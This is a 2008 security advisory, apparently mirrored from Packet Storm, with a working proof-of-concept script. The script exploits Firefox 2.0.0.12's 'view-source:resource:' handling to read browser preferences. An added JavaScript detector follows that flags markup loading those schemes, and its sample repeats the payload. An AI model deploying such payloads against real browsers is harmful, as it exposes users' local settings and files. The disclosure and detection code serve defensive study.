firefox20012-poc.txt

11 Feb 2008 00:00:00 | Reported by Carl Hardwick | Type: packetstorm | Source: packetstormsecurity.com

Firefox 2.0.0.12 information leak exploit using 'view-source:' scheme

Code
`Don't blame the extension developers this time :)  
  
You probably thought otherwise after they just released version  
2.0.0.12 a couple of hours ago, that had a fix for numerous other  
vulnerabilities. But guess what? We are going to see 2.0.0.13 pretty  
soon I guess. I snared at Mozilla before: don't patch vulnerabilities  
for fifty percent, take the time and fix the cause. Because directory  
traversal through plugins is all nice and such, we don't need it. We  
can trick Firefox itself in traversing directories back. I found  
another information leak that is very serious because we are able to  
read out all preferences set in Firefox, or just open or include about  
every file stored in the Mozilla program files directory, and this  
without any mandatory settings or plugins.  
  
In the vulnerability we make use of the 'view-source:' scheme that  
allows us to source out the 'resource:' scheme. With it, we can view  
the source of any file located in the 'resource:///' directory, which  
translates back to: file:///C:/Program Files/Mozilla Firefox/. Then we  
only include the file inside it and it becomes available to a new  
page's DOM, and so we are able to read all settings.  
  
Other issues can emerge also, this is only a short-hand proof of  
concept. Like always, more is possible. While chatting with Gareth  
Heyes, I came up with the vector in a couple of minutes. We talked  
about more issues which we probably are going to discuss very soon.  
  
<script>  
  
/*  
@name: Firefox <= 2.0.0.12 information leak pOc  
@date: Feb. 07 2008  
@author: Ronald van den Heetkamp  
@url: http://www.0x000000.com  
*/  
  
pref = function(a,b) {  
  
document.write( a + ' -> ' + b + '<br />');  
  
};  
  
</script>  
  
<script src="view-source:resource:///greprefs/all.js"></script>  
  
`
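
A defensive check for the pattern the proof of concept above relies on, markup that loads a subresource through the 'view-source:' or 'resource:' schemes. This is an added example, not part of the original advisory; the function names and the sample markup (including the `resource:///defaults/x` path) are constructed for illustration.

```javascript
// Added example: flag src/href/data attributes in untrusted HTML whose URL
// uses one of the schemes named in the advisory. Regex-based on purpose so it
// runs without dependencies; a production filter should use a real HTML parser.
const FLAGGED_SCHEMES = ['view-source:', 'resource:'];

// Out-of-range code points are dropped instead of throwing.
const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '');

// Decode the character references that could otherwise hide a scheme name.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&colon;/gi, ':');
}

// Normalise roughly as a URL parser does before it reads the scheme:
// strip leading whitespace/control characters, drop tab/CR/LF, lowercase.
function normaliseUrl(raw) {
  return decodeEntities(raw)
    .replace(/^[\u0000-\u0020]+/, '')
    .replace(/[\t\r\n]/g, '')
    .toLowerCase();
}

// Return one finding per URL-bearing attribute that uses a flagged scheme.
function findPrivilegedSchemeLoads(html) {
  const tagRe = /<([a-z][a-z0-9]*)\b([^>]*)>/gi;
  const attrRe = /(?<![\w-])(src|href|data)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const findings = [];
  for (const t of html.matchAll(tagRe)) {
    for (const a of t[2].matchAll(attrRe)) {
      const url = normaliseUrl(a[2] ?? a[3] ?? a[4] ?? '');
      const scheme = FLAGGED_SCHEMES.find((s) => url.startsWith(s));
      if (scheme) {
        findings.push({ tag: t[1].toLowerCase(), attr: a[1].toLowerCase(), scheme, url });
      }
    }
  }
  return findings;
}

// Constructed sample input: two benign lines and two that should be flagged.
const SAMPLE = [
  '<script src="https://example.com/app.js"></script>',
  '<script src="view-source:resource:///greprefs/all.js"></script>',
  "<iframe SRC=' Resource:///defaults/x'></iframe>",
  '<a href="/view-source-help.html">help</a>',
].join('\n');
```
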

Vulners AI Score: 7.4 (High risk)